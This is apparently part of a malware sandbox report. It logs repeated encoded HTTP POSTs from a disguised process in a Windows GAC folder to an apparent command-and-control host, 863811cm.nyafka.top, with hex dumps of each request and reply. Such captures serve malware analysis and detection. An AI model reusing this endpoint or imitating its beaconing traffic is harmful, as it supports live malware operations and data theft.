                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yV%2FZGqHHjU0FkHHMjN6FBkH1eyIwZsjQWTKolxJQ1AsPnjB3QX9i7n2VjnYWhghBuPLogBawA9XQGqBd8P72afcvvKvrKGWM9ewNIA2cVyyGv6gnrcfitR4%2BLUA0G%2Bpwumutw58a"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a7042ec380f78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 04 3e 39 2a 56 23 00 0d 5a 3b 32 38 5a 3d 13 26 5e 3f 57 27 12 26 1d 3f 5c 2d 12 0f 53 36 05 2c 5d 2a 2f 21 06 24 3f 24 00 3c 21 2a 51 03 1b 3a 02 3f 23 28 0d 2b 54 32 07 28 1c 0f 59 27 0d 29 09 29 13 2d 12 25 3d 3e 1b 36 22 37 0f 3e 05 2f 1f 2c 15 23 09 3d 06 25 01 37 01 2a 5f 08 13 39 50 29 06 34 57 22 27 3a 00 23 2d 3b 55 36 39 22 50 3e 29 29 0c 24 33 0e 5e 38 0c 28 5a 23 01 02 08 22 2c 26 53 21 2d 24 5b 32 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$>9*V#Z;28Z=&^?W'&?\-S6,]*/!$?$<!*Q:?#(+T2(Y'))-%=>6"7>/,#=%7*_9P)4W"':#-;U69"P>))$3^8(Z#",&S!-$[2("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.550066188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:23.971050024 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:24.316212893 CEST2584OUTData Raw: 55 5d 5d 55 54 5c 58 52 5e 5a 55 58 51 56 5a 5a 57 5d 58 54 55 51 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]]UT\XR^ZUXQVZZW]XTUQQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-,X<)3W%-$(+#( (4?S$!U*(<C!!');#Y$/\*-
                                                                Oct 11, 2024 01:37:24.403330088 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:24.695569992 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wVQjdp7vSPKsOJgV2l1gg%2FSX%2BQiR8KZUhiN%2F3bOygwZpqbMRqTgr7ddbJCp4T95T2JsgU8Nwzbvz61%2Fmgu9FeIOnzTF03NfL822CAfQQdrG3sC7is5d6PyfEXqTEJSL%2BNVj8it2"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70273b2818bc-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                86192.168.2.550067188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:24.816431046 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:25.176142931 CEST2584OUTData Raw: 50 5b 58 5e 51 5f 58 5e 5e 5a 55 58 51 52 5a 5f 57 5f 58 5f 55 50 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[X^Q_X^^ZUXQRZ_W_X_UPQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(0\??V1=;*&#5)37'(0%R*^?!!,X(+#Y$/\*
                                                                Oct 11, 2024 01:37:25.280973911 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:25.530868053 CEST585INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JDm%2BeV6XXC2lcqN5eCXuaj8FZkdstzWboqRlssZp8%2BxXeQ7toPNsoao8HHSVzTzpDOabv4YKGceI9Qvh15Sbkr0LupIeC0y5hfMM%2BndADVNoz2R%2B2vnUAh%2B1JIEi2xvcUunMebrx"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a702cac227ca2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Oct 11, 2024 01:37:25.621032000 CEST14INData Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                87192.168.2.550068188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:25.739502907 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:26.097306013 CEST2584OUTData Raw: 50 5e 5d 55 54 5d 5d 52 5e 5a 55 58 51 54 5a 53 57 58 58 5d 55 57 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]UT]]R^ZUXQTZSWXX]UWQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9<(Z+:,2>8B+,X5#(3-W7'=")(("!$_>#Y$/\*%
                                                                Oct 11, 2024 01:37:26.193032980 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:26.364041090 CEST605INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoAlxZzrC116%2F4RNR8R5%2FalxBw0Eyvp8%2F5DKD04C%2FAU5cTaERR5zD1xtmpIsGmSuWBg3SwedXTur%2B7gIQNDs3i%2BeB0jY17vaQDv%2BqEQKZHD1D1j4yURq3aahmlNgLYu2UlRn8%2Fd8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70326ae4c359-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                88192.168.2.550069188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:26.528709888 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:26.878580093 CEST2584OUTData Raw: 50 5e 5d 54 54 58 5d 55 5e 5a 55 58 51 54 5a 53 57 50 58 5d 55 52 51 59 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]TTX]U^ZUXQTZSWPX]URQYXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<=(?1(*64\68?< %V#'#Q'=:((/"0^=#Y$/\*%
                                                                Oct 11, 2024 01:37:27.090992928 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:27.458091021 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zrDCT57WCsPetcgpq1jyn6%2BXo9XfKpPXuW%2B8QbwwSM3zwuno4m5XPZKe%2B%2BU7sZQ2fpFHu0rUdE%2B7aKF4ZuoVY3g7tdLwzm06Zk6fG7Ec0vSkfX78eS25i8Imj%2FGJi7b4Sc4iMrcR"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70375ae17ce7-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                89192.168.2.550070188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:27.582386017 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:27.940962076 CEST2584OUTData Raw: 50 58 5d 58 54 5b 58 5e 5e 5a 55 58 51 56 5a 58 57 5f 58 59 55 52 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]XT[X^^ZUXQVZXW_XYURQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y?=0X>*%.(%5 (#S $&.9V>;8G"!+=+#Y$/\*-
                                                                Oct 11, 2024 01:37:28.026710987 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:28.280070066 CEST601INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WCMqwtd%2FWijv1PEdxqLj76559DU51hVFpvZb3S75Yti%2FITRo9MiU8osublz%2BVRgDUIjSta3V0mIllnd0R3JULzwStxFtaY8ewu%2FcEJDk6L%2FvrgvLPjRt%2FL9AjpLFdId7XaERfEuz"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a703dd8997cb2-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                90192.168.2.550071188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:28.417577982 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:28.769026041 CEST2584OUTData Raw: 55 58 5d 5f 51 5e 58 53 5e 5a 55 58 51 57 5a 5e 57 59 58 5d 55 56 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX]_Q^XS^ZUXQWZ^WYX]UVQRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:?[/(01>(?67!0+7;P'R>88C !8>#Y$/\*)
                                                                Oct 11, 2024 01:37:28.890631914 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:29.061369896 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPnlvyCLlr282Gp7cl7x1LZr%2BgNDQEJYs2rfj6S84z6ph7v585B%2BcUwiLG3ADp0yrom6CCEkNA9ik2cCttjvzoFGbcBkdC1KiIPrpCc1vQ0N7xsSOkTTCG2gJioQ3Z%2Fc3F9YvfZH"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70433d7e43ec-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                91192.168.2.550072188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:37:29.253737926 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:29.612755060 CEST2004OUTData Raw: 50 5f 5d 58 54 5d 58 56 5e 5a 55 58 51 5d 5a 5a 57 5f 58 5b 55 51 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_]XT]XV^ZUXQ]ZZW_X[UQQ]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+-#+9#T%$E+,_5?]+!$3-)$B"?)#Y$/\*
                                                                Oct 11, 2024 01:37:29.699681044 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:29.911955118 CEST750INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKge6mx%2BYsTDE0vhuSJnjC6APnOxH8vbL7WAOq0jqQbL7oofCkuqEU5jkSXTJ7uc1VXtPMNk%2BZ35v4QuzC7%2F8FQpcYikN6QoEDA1o%2F%2FmSa0SGh0i6rx9J%2ByYC5299PkVHZndzakG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a70485e38c35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5e 2a 29 08 1d 23 10 05 5c 2c 08 2f 03 2a 04 2e 58 2b 32 2f 1d 24 27 24 00 2d 3f 29 11 35 05 01 01 2a 3c 31 07 26 3c 05 1f 3f 1b 2a 51 03 1b 39 58 3e 20 37 1c 3f 32 2a 06 29 22 29 58 30 0a 35 43 2b 3d 32 08 30 3e 03 04 36 21 28 53 2a 2c 2b 57 38 2b 05 42 2a 5e 2d 02 21 3b 2a 5f 08 13 3a 0e 3e 5e 34 51 35 09 26 05 22 04 23 54 35 00 32 50 3d 00 3d 0f 27 55 2c 5f 2c 0c 2f 07 37 06 23 56 21 3f 29 0c 23 2e 20 5a 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'^*)#\,/*.X+2/$'$-?)5*<1&<?*Q9X> 7?2*)")X05C+=20>6!(S*,+W8+B*^-!;*_:>^4Q5&"#T52P=='U,_,/7#V!?)#. Z28"_")Q?TR0
                                                                Oct 11, 2024 01:37:30.019258976 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:30.114272118 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:30.114444017 CEST2004OUTData Raw: 55 59 5d 5b 51 5c 58 50 5e 5a 55 58 51 5c 5a 5f 57 5b 58 5f 55 5d 51 5d 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY][Q\XP^ZUXQ\Z_W[X_U]Q]XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+7?*'.;?6,^"+0(3R7V0[!S)@ 10Y(+#Y$/\*
                                                                Oct 11, 2024 01:37:30.415658951 CEST754INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nWRy7DtLV5RyQVopDsXFKi4OruA3LIPlOksgbT%2BDL2M%2FJk5D2n4LS9tPNgpJxk9yKupKWceEuMyuMmCrGWUrz%2BAzcCBIL44qqN23nL%2BRlCLDvI%2B%2BqzZxaA%2Bkr3Ac%2B4NayKYwUuDG"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a704ae84dc35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 01 2a 5f 3e 1d 37 00 0a 02 2d 21 20 5e 3d 3e 2d 04 28 0f 0a 01 31 34 23 5e 3a 3c 3e 0a 36 38 37 00 29 02 36 5e 27 12 20 05 28 0b 2a 51 03 1b 39 59 3c 0d 33 50 3f 32 21 14 28 54 2d 5d 27 33 13 09 29 04 32 0c 25 3d 22 14 23 31 2c 1e 3d 3c 2f 53 38 2b 2f 44 3e 16 2a 5a 34 3b 2a 5f 08 13 3a 0d 3d 3b 24 56 22 24 29 15 21 2e 23 1f 35 29 0b 08 3d 00 22 1e 24 30 3f 06 2f 1c 20 5e 21 2c 23 54 36 3c 22 1d 23 03 23 00 25 02 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*_>7-! ^=>-(14#^:<>687)6^' (*Q9Y<3P?2!(T-]'3)2%="#1,=</S8+/D>*Z4;*_:=;$V"$)!.#5)="$0?/ ^!,#T6<"##%"_")Q?TR0
                                                                Oct 11, 2024 01:37:30.416440964 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:30.512413025 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:30.517705917 CEST540OUTData Raw: 50 5d 5d 5b 54 5b 58 56 5e 5a 55 58 51 53 5a 52 57 5a 58 54 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P]][T[XV^ZUXQSZRWZXTU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X?<Y>*S'./+"8/](#*4' $-**^$G"1#=;#Y$/\*9
                                                                Oct 11, 2024 01:37:30.767726898 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNaCiAsQw1xDYvZp1Be7zTII1vWjsGD6a9uPx4vTYkseU6gnU09j7fLFzboajd%2BbOpDe2DVUkcttgOhemx2b9Afbx%2F0h752Ha00zUqXvXBrmzAF04qh4eEe6BGDA5Tj1cDkio1RF"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a704d6a8ec35d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:37:30.768294096 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:30.862354040 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:30.862579107 CEST1984OUTData Raw: 50 53 5d 5a 51 59 58 52 5e 5a 55 58 51 57 5a 5d 57 5e 58 59 55 54 51 58 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PS]ZQYXR^ZUXQWZ]W^XYUTQXXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(?+:(2.B*&+#;Z?0%V443>1V(+(F6$Y*#Y$/\*)
                                                                Oct 11, 2024 01:37:31.160028934 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
